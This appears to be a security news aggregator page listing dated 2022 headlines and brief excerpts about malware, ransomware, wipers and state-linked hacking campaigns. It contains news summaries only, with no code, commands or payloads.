What's new arround internet
| Src | Date (GMT) | Titre | Description | Tags | Stories | Notes |
 |
2022-05-18 07:41:40 | Experts spotted a new variant of UpdateAgent macOS malware dropper written in Swift (lien direct) | >Researchers spotted a new variant of the UpdateAgent macOS malware dropper that was employed in attacks in the wild. Researchers from the Jamf Threat Labs team have uncovered a new variant of the UpdateAgent macOS malware dropper. The new version is written in Swift and relies on the AWS infrastructure to host its malicious payloads. […] | Malware Threat | ||
|
2022-05-17 19:10:57 | Venezuelan cardiologist accused of operating and selling Thanos ransomware (lien direct) | >The U.S. Justice Department accused a 55-year-old Venezuelan cardiologist of operating and selling the Thanos ransomware. The U.S. Justice Department accused Moises Luis Zagala Gonzalez, a 55-year-old cardiologist from Venezuela, of operating and selling the Thanos ransomware. Thanos ransomware (a.k.a. Hakbit ransomware) has been developed by Nosophoros (aka Aesculapius, and Nebuchadnezzar), a threat actor offering for sale the malware […] | Ransomware Malware Threat | ||
|
2022-05-16 14:48:12 | Experts show how to run malware on chips of a turned-off iPhone (lien direct) | >Researchers devised an attack technique to tamper the firmware and execute a malware onto a Bluetooth chip when an iPhone is “off.” A team of researchers from the Secure Mobile Networking Lab (SEEMOO) at the Technical University of Darmstadt demonstrated a technique to tamper with the firmware and load malware onto a chip while an […] | Malware | ||
|
2022-05-12 20:52:17 | New Nerbian RAT spreads via malspam campaigns using COVID-19 (lien direct) | Researchers spotted a new remote access trojan, named Nerbian RAT, which implements sophisticated evasion and anti-analysis techniques. Researchers from Proofpoint discovered a new remote access trojan called Nerbian RAT that implements sophisticated anti-analysis and anti-reversing capabilities. The malware spreads via malspam campaigns using COVID-19 and World Health Organization (WHO) themes. The name of the RAT […] | Malware | ★★ | |
|
2022-05-09 12:17:11 | CERT-UA warns of malspam attacks distributing the Jester info stealer (lien direct) | The Computer Emergency Response Team of Ukraine (CERT-UA) warns of attacks spreading info-stealing malware Jester Stealer. The Computer Emergency Response Team of Ukraine (CERT-UA) has detected malspam campaigns aimed at spreading an info-stealer called Jester Stealer. The malicious messages spotted by the Ukrainian CERT have the subject line “chemical attack” and contain a link to a […] | Malware | ★★★ | |
|
2022-05-08 08:15:14 | Security Affairs newsletter Round 364 by Pierluigi Paganini (lien direct) | A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. Raspberry Robin spreads via removable USB devices Malware campaign hides a shellcode into Windows […] | Malware | ||
|
2022-05-07 13:24:57 | Malware campaign hides a shellcode into Windows event logs (lien direct) | Experts spotted a malware campaign that is the first one using a technique of hiding a shellcode into Windows event logs. In February 2022 researchers from Kaspersky spotted a malicious campaign using a novel technique that consists of hiding the shellcode in Windows event logs. The technique allows hiding a fileless Trojan, the experts also […] | Malware | ★★★★ | |
|
2022-05-06 13:28:06 | NetDooka framework distributed via a pay-per-install (PPI) malware service (lien direct) | Researchers discovered a sophisticated malware framework, dubbed NetDooka, distributed via a pay-per-install (PPI) malware service known as PrivateLoader. Trend Micro researchers uncovered a sophisticated malware framework dubbed NetDooka that is distributed via a pay-per-install (PPI) service known as PrivateLoader and includes multiple components, including a loader, a dropper, a protection driver, and a full-featured remote […] | Malware | ★★★★ | |
|
2022-05-06 10:02:23 | Vulnerable Docker Installations Are A Playhouse for Malware Attacks (lien direct) | Uptycs researchers identified ongoing malicious campaigns through our Docker honeypot targeting exposed Docker API. The Uptycs Threat Research team has identified ongoing malicious campaigns through our Docker honeypot targeting exposed Docker API port 2375. The attacks are related to crypto miners and reverse shells on the vulnerable servers using base64-encoded commands in the cmdline, built […] | Malware Threat | ||
|
2022-05-04 09:58:57 | An expert shows how to stop popular ransomware samples via DLL hijacking (lien direct) | A security researcher discovered that samples of Conti, REvil, LockBit ransomware were vulnerable to DLL hijacking. The security researcher John Page aka (hyp3rlinx) discovered that malware from multiple ransomware operations, including Conti, REvil, LockBit, AvosLocker, and Black Basta, are affected by flaws that could be exploited block file encryption. Page shared its findings through its […] | Ransomware Malware | ||
|
2022-05-03 10:56:27 | China-linked Moshen Dragon abuses security software to sideload malware (lien direct) | A China-linked APT group, tracked as Moshen Dragon, is exploiting antivirus products to target the telecom sector in Asia. A China-linked APT group, tracked as Moshen Dragon, has been observed targeting the telecommunication sector in Central Asia with ShadowPad and PlugX malware, SentinelOne warns. Both PlugX and ShadowPad malware are very common among China-linked cyberespionage […] | Malware | ||
|
2022-04-28 14:49:32 | Bumblebee, a new malware loader used by multiple crimeware threat actors (lien direct) | Threat actors have replaced the BazaLoader and IcedID malware with a new loader called Bumblebee in their campaigns. Cybercriminal groups that were previously using the BazaLoader and IcedID as part of their malware campaigns seem to have adopted a new loader called Bumblebee. The loader appears to be under development and is a highly sophisticated […] | Malware Threat | ||
|
2022-04-20 06:44:41 | New BotenaGo variant specifically targets Lilin security camera DVR devices (lien direct) | Researchers spotted a new variant of the BotenaGo botnet malware that is considered highly evasive and has a zero-detection rate. The BotenaGo botnet was first spotted in November 2021 by researchers at AT&T, the malicious code leverages thirty-three exploits to target millions of routers and IoT devices. BotenaGo was written in Golang (Go) and at the […] | Malware | ||
|
2022-04-19 12:29:55 | Kaspersky releases a free decryptor for Yanluowang ransomware (lien direct) | Kaspersky discovered a flaw in the encryption process of the Yanluowang ransomware that allows victims to recover their files for free. Researchers from Kaspersky discovered a vulnerability in the encryption process of the Yanluowang ransomware that can be exploited to recover the files encrypted by the malware without paying the ransom. The Yanluowang ransomware was […] | Ransomware Malware Vulnerability | ||
|
2022-04-19 08:54:40 | New SolarMarker variant upgrades evasion abilities to avoid detection (lien direct) | Researchers disclosed a new variant of the SolarMarker malware that implements new techniques to avoid detection. Cybersecurity researchers from Palo Alto Networks disclosed a new version of the SolarMarker malware that implements new features to avoid detection. SolarMarker (aka Jupyter, Polazert, and Yellow Cockatoo) is a fileless .NET RAT that implements backdoor capabilities and allows operators to steal […] | Malware | ||
|
2022-04-18 17:46:46 | Experts spotted Industrial Spy, a new stolen data marketplace (lien direct) | A new marketplace named Industrial Spy that focuses on the sale of stolen data appeared in the threat landscape. Malware HunterTeam and Bleeping Computer reported the born of a new marketplace called Industrial Spy that sells stolen data and offers free stolen data to its members. MalwareHunterTeam researchers spotted malware samples [1, 2] that drop the […] | Malware Threat | ||
|
2022-04-16 11:49:34 | Threat actors target the Ukrainian gov with IcedID malware (lien direct) | Threat actors are targeting Ukrainian government agencies with phishing attacks delivering the IcedID malware. The Ukrainian Computer Emergency Response Team (CERT-UA) uncovered new phishing campaigns aimed at infecting systems of Ukrainian government agencies with the IcedID malware. IcedID banking trojan first appeared in the threat landscape in 2017, it has capabilities similar to other financial threats […] | Malware Threat | ||
|
2022-04-13 14:52:23 | China-linked Hafnium APT leverages Tarrask malware to gain persistence (lien direct) | China-linked Hafnium APT group started using a new piece of new malware to gain persistence on compromised Windows systems. The China-backed Hafnium cyberespionage group is likely behind a piece of a new malware, dubbed Tarrask, that’s used to maintain persistence on compromised Windows systems, reported Microsoft Threat Intelligence Center (MSTIC) experts. HAFNIUM primarily targets entities […] | Malware Threat | ||
|
2022-04-12 14:05:20 | Russia-linked Sandworm APT targets energy facilities in Ukraine with wipers (lien direct) | Russia-linked Sandworm APT group targeted energy facilities in Ukraine with INDUSTROYER2 and CADDYWIPER wipers. Russia-linked Sandworm threat actors targeted energy facilities in Ukraine with a new strain of the Industroyer ICS malware (INDUSTROYER2) and a new version of the CaddyWiper wiper. According to the CERT-UA, nation-state actors targeted high-voltage electrical substations with INDUSTROYER2, the variant analyzed by […] | Malware Threat | ||
|
2022-04-11 20:47:50 | FFDroider, a new information-stealing malware disguised as Telegram app (lien direct) | Cybersecurity researchers spotted a new Windows information-stealing malware, named FFDroider, designed to steal credentials and cookies. Cybersecurity researchers from Zscaler ThreatLabz warn of a new information-stealing malware, named FFDroider, that disguises itself as the popular instant messaging app Telegram. The malware was derived to siphon credentials and cookies from infected machines. “Recently, ThreatLabz identified a novel windows […] | Malware | ||
|
2022-04-07 14:56:47 | Colibri Loader employs clever persistence mechanism (lien direct) | Recently discovered malware loader Colibri leverages a trivial and efficient persistence mechanism to deploy Windows Vidar data stealer. Malwarebytes researchers observed a new loader, dubbed Colibri, which has been used to deploy a Windows information stealer tracked as Vidar in a recent campaign. The Colibri Loader first appeared in the threat landscape in August 2021 […] | Malware Threat | ||
|
2022-04-04 15:20:06 | Experts spotted a new Android malware while investigating by Russia-linked Turla APT (lien direct) | Researchers spotted a new piece of Android malware while investigating activity associated with Russia-linked APT Turla. Researchers at cybersecurity firm Lab52 discovered a new piece of Android malware while investigating into infrastructure associated with Russia-linked APT Turla. The malicious code was discovered while analyzing the Penquin-related infrastructure, the experts noticed malware was contacting IP addresses […] | Malware | ★★★★ | |
|
2022-03-31 14:00:36 | Google TAG details cyber activity with regard to the invasion of Ukraine (lien direct) | The Google TAG uses uncovered phishing attacks targeting Eastern European and NATO countries, including Ukraine. The Google Threat Analysis Group (TAG) provided an update about nation-state attacks related ongoing Russian invasion of Ukraine, the experts spotted phishing and malware attacks targeting Eastern European and NATO countries, including Ukraine The researchers uncovered a phishing campaign conducted by a […] | Malware | ||
|
2022-03-23 21:43:36 | Ukrainian enterprises hit with the DoubleZero wiper (lien direct) | Ukraine CERT-UA warns of cyberattack aimed at Ukrainian enterprises using the a wiper dubbed DoubleZero. Ukraine CERT-UA continues to observe malware based attacks aimed at Ukrainian organizations, in a recent alert it warned of attacks employing a wiper dubbed DoubleZero. The government CERT started observing this campaign on March 17, 2022, threat actors launched spear-phishing […] | Malware Threat | ||
|
2022-03-23 12:50:03 | China-linked GIMMICK implant now targets macOS (lien direct) | Gimmick is a newly discovered macOS implant developed by the China-linked APT Storm Cloud and used to target organizations across Asia. In late 2021, Volexity researchers investigated an intrusion in an environment they were monitoring and discovered a MacBook Pro running macOS 11.6 (Big Sur) that was compromised with a previously unknown macOS malware tracked […] | Malware | ||
|
2022-03-18 12:43:23 | Russia-linked Cyclops Blink botnet targeting ASUS routers (lien direct) | The recently discovered Cyclops Blink botnet, which is believed to be a replacement for the VPNFilter botnet, is now targeting the ASUS routers. The recently discovered Cyclops Blink botnet is now targeting the ASUS routers, reports Trend Micro researchers. The Cyclops Blink malware has been active since at least June 2019, it targets WatchGuard Firebox and other […] | Malware | VPNFilter | |
|
2022-03-18 06:32:57 | (Déjà vu) Microsoft releases open-source tool for checking MikroTik Routers compromise (lien direct) | Microsoft released an open-source tool to secure MikroTik routers and check for indicators of compromise for Trickbot malware infections. Microsoft has released an open-source tool, dubbed RouterOS Scanner, that can be used to secure MikroTik routers and check for indicators of compromise associated with Trickbot malware infections. “This analysis has enabled us to develop a […] | Malware Tool | ||
|
2022-03-17 11:16:02 | B1txor20 Linux botnet use DNS Tunnel and Log4J exploit (lien direct) | Researchers uncovered a new Linux botnet, tracked as B1txor20, that exploits the Log4J vulnerability and DNS tunnel. Researchers from Qihoo 360’s Netlab have discovered a new backdoor used to infect Linux systems and include them in a botnet tracked as B1txor20. The malware was first spotted on February 9, 2022, when 360Netlab’s honeypot system captured […] | Malware Vulnerability | ||
|
2022-03-15 05:33:53 | CaddyWiper, a new data wiper hits Ukraine (lien direct) | Experts discovered a new wiper, tracked as CaddyWiper, that was employed in attacks targeting Ukrainian organizations. Experts at ESET Research Labs discovered a new data wiper, dubbed CaddyWiper, that was employed in attacks targeting Ukrainian organizations. The security firm has announced the discovery of the malware with a series of tweets: “This new malware erases […] | Malware | ||
|
2022-03-13 14:47:13 | The hidden C2: Lampion trojan release 212 is on the rise and using a C2 server for two years (lien direct) | The hidden C2: Lampion trojan release 212 is on the rise and using a C2 server for two years. Lampion trojan is one of the most active banking trojans impacting Portuguese Internet end users since 2019. This piece of malware is known for the usage of the Portuguese Government Finance & Tax (Autoridade Tributária e Aduaneira) email […] | Malware | ||
|
2022-03-12 16:40:23 | Attackers use website contact forms to spread BazarLoader malware (lien direct) | Threat actors are spreading the BazarLoader malware via website contact forms to evade detection, researchers warn. Researchers from cybersecurity firm Abnormal Security observed threat actors spreading the BazarLoader/BazarBackdoor malware via website contact forms. TrickBot operation has recently arrived at the end of the journey, according to AdvIntel some of its top members move under the Conti ransomware gang, […] | Malware Threat | ||
|
2022-03-10 21:51:37 | Crooks target Ukraine\'s IT Army with a tainted DDoS tool (lien direct) | Threat actors are spreading password-stealing malware disguised as a security tool to target Ukraine’s IT Army. Cisco Talos researchers have uncovered a malware campaign targeting Ukraine’s IT Army, threat actors are using infostealer malware mimicking a DDoS tool called the “Liberator.” The Liberator tool is circulating among pro-Ukraina hackers that use it to target Russian […] | Malware Tool Threat | ||
|
2022-03-07 15:46:40 | SharkBot, the new generation banking Trojan distributed via Play Store (lien direct) | SharkBot banking malware was able to evade Google Play Store security checks masqueraded as an antivirus app. SharkBot is a banking trojan that has been active since October 2021, it allows to steal banking account credentials and bypass multi-factor authentication mechanisms. The malware was spotted at the end of October by researchers from cyber security firms […] | Malware | ||
|
2022-03-06 13:20:00 | Security Affairs newsletter Round 356 (lien direct) | A new round of the weekly Security Affairs newsletter arrived! Every week the best security articles from Security Affairs free for you in your email box. If you want to also receive for free the newsletter with the international press subscribe here. Charities and NGOs providing support in Ukraine hit by malware Lapsus$ gang leaks data […] | Malware | ||
|
2022-03-06 10:48:53 | Charities and NGOs providing support in Ukraine hit by malware (lien direct) | Malware based attacks are targeting charities and non-governmental organizations (NGOs) providing support in Ukraine Charities and non-governmental organizations (NGOs) that in these weeks are providing support in Ukraine are targeted by malware attacks aiming to disrupt their operations. The news was reported by Amazon that associates the attacks with state-sponsored hackers and confirmed that it […] | Malware | ||
|
2022-03-01 00:12:28 | FoxBlade malware targeted Ukrainian networks hours before Russia\'s invasion (lien direct) | Microsoft revealed that Ukrainian entities were targeted with a previous undetected malware, dubbed FoxBlade, several hours before the invasion. The Microsoft Threat Intelligence Center (MSTIC) continues to investigate the attacks that are targeting Ukrainian networks and discovered that entities in Ukraine were targeted with a previously undetected malware, dubbed FoxBlade, several hours before Russia’s invasion. […] | Malware Threat | ||
|
2022-02-26 18:44:00 | Fileless SockDetour backdoor targets U.S.-based defense contractors (lien direct) | Researchers provided details about a stealthy custom malware dubbed SockDetour that targeted U.S.-based defense contractors. Cybersecurity researchers from Palo Alto Networks’ Unit 42 have analyzed a previously undocumented and custom backdoor tracked as SockDetour that targeted U.S.-based defense contractors. According to the experts, the SockDetour backdoor has been in the wild since at least July 2019. Unit 42 attributes […] | Malware | ||
|
2022-02-25 06:20:44 | US and UK details a new Python backdoor used by MuddyWater APT group (lien direct) | US and UK cybersecurity agencies provided details of a new malware used by Iran-linked MuddyWater APT. CISA, the FBI, the US Cyber Command’s Cyber National Mission Force (CNMF), UK’s National Cyber Security Centre (NCSC-UK), and the NSA, and law enforcement agencies have published a joint advisory on new malware used by Iran-linked MuddyWater APT group […] | Malware | ||
|
2022-02-24 19:28:49 | Data wiper attacks on Ukraine were planned at least in November and used ransomware as decoy (lien direct) | Experts reported that the wiper attacks that yesterday hit hundreds of systems in Ukraine used a GoLang-based ransomware decoy. Yesterday, researchers from cybersecurity firms ESET and Broadcom's Symantec discovered a new data wiper malware that was employed in a recent wave of attacks that hit hundreds of machines in Ukraine. A tweet from ESET revealed that the company's telemetry shows […] | Ransomware Malware | ||
|
2022-02-24 11:54:24 | New Wiper Malware HermeticWiper targets Ukrainian systems (lien direct) | Cybersecurity experts discovered a new data wiper malware that was used in attacks against hundreds of machines in Ukraine. The threat of hybrid warfare is reality, Russia-linked APT group have supported the operations of the Russian army while preparing for the invasion. Researchers from cybersecurity firms ESET and Broadcom’s Symantec discovered a new data wiper malware that was employed in […] | Malware Threat | ★★★★★ | |
|
2022-02-24 05:31:35 | US and UK link new Cyclops Blink malware to Russian state hackers (lien direct) | UK and US cybersecurity agencies linked Cyclops Blink malware to Russia’s Sandworm APT US and UK cybersecurity and law enforcement agencies published a joint security advisory about a new malware, dubbed Cyclops Blink, that has been linked to the Russian-backed Sandworm APT group. Sandworm (aka BlackEnergy and TeleBots) has been active since 2000, it operates under the […] | Malware | ||
|
2022-02-23 08:06:39 | Iranian Broadcaster IRIB hit by wiper malware (lien direct) | Iranian national media corporation, Islamic Republic of Iran Broadcasting (IRIB), was hit by a wiper malware in late January 2022. An investigation into the attack that hit the Islamic Republic of Iran Broadcasting (IRIB) in late January, revealed the involvement of a disruptive wiper malware along with other custom-made backdoors, and scripts and configuration files […] | Malware | ||
|
2022-02-20 09:52:00 | Trickbot operation is now controlled by Conti ransomware (lien direct) | The Conti ransomware group takes over TrickBot malware operation and plans to replace it with BazarBackdoor malware. TrickBot operation has arrived at the end of the journey, according to AdvIntel some of its top members move under the Conti ransomware gang, which is planning to replace the popular banking Trojan with the stealthier BazarBackdoor. TrickBot is […] | Ransomware Malware | ||
|
2022-02-17 23:06:16 | Threat actors leverage Microsoft Teams to spread malware (lien direct) | Attackers compromise Microsoft Teams accounts to attach malicious executables to chat and spread them to participants in the conversation. While the popularity of Microsoft Teams continues to grow, with roughly 270 million monthly active users, threat actors started using it as an attack vector. Starting in January 2022, security researchers from Avanan observed attackers compromising […] | Malware Threat | ||
|
2022-02-17 14:52:57 | European Data Protection Supervisor call for bans on surveillance spyware like Pegasus (lien direct) | The European Data Protection Supervisor authority called for a ban on the development and the use of Pegasus-like commercial spyware. The European Data Protection Supervisor (EDPS) authority this week called for a ban on the development and the use of surveillance software like the Pegasus spyware in the EU. Pegasus is a surveillance malware developed by […] | Malware | ||
|
2022-02-16 19:29:18 | Trickbot targets customers of 60 High-Profile companies (lien direct) | TrickBot malware is targeting customers of 60 financial and technology companies with new anti-analysis features. The infamous TrickBot malware was employed in attacks against customers of 60 financial and technology companies with new anti-analysis features. The news wave of attacks aimed at cryptocurrency firms, most of them located in the U.S.. Trickbot is a sophisticated, […] | Malware | ||
|
2022-02-10 13:50:17 | Attackers Increasingly Adopting Regsvr32 Utility Execution Via Office Documents (lien direct) | The Uptycs threat research team has been observing an increase in utilization of regsvr32.exe heavily via various types of Microsoft Office documents. The full report that includes Indicators of Compromise (IOCs) is available here: https://www.uptycs.com/blog/attackers-increasingly-adopting-regsvr32-utility-execution-via-office-documents During our analysis of these malware samples, we have identified that some of the malware samples belonged to Qbot and […] | Malware Threat | ★★★★★ | |
|
2022-02-09 16:51:32 | (Déjà vu) Master decryption keys for Maze, Egregor, and Sekhmet ransomware leaked online (lien direct) | The master decryption keys for the Maze, Egregor, and Sekhmet ransomware operations were released last night on the BleepingComputer forums. The master decryption keys for the Maze, Egregor, and Sekhmet ransomware families were released on the BleepingComputer forums by the alleged malware developer. The Maze group was considered one of the most prominent ransomware operations […] | Ransomware Malware | ||
|
2022-02-09 09:16:36 | The Pirate Bay clones target millions of users with malware and malicious ads (lien direct) | CyberNews researchers discovered five clones of The Pirate Bay serving malicious ads to more than seven million users each month. Original Post @ https://cybernews.com/security/the-pirate-bay-clones-target-millions-of-users-with-malware-and-malicious-ads/ CyberNews security researchers discovered five malicious domains masquerading as alternatives to The Pirate Bay. These domains were serving malicious ads to more than seven million users each month. Malvertising, also known […] | Malware | ||
|
2022-02-08 08:35:39 | Roaming Mantis SMSishing campaign now targets Europe (lien direct) | The Roaming Mantis SMS phishing campaign is now targeting Android and iPhone users in Europe with malicious apps and phishing pages. Roaming Mantis surfaced in March 2018 when hacked routers in Japan redirecting users to compromised websites. Roaming Mantis is a credential theft and malware campaign that leverages smishing to distribute malicious Android apps in the format of […] | Malware |
To see everything:
Our RSS (filtrered)
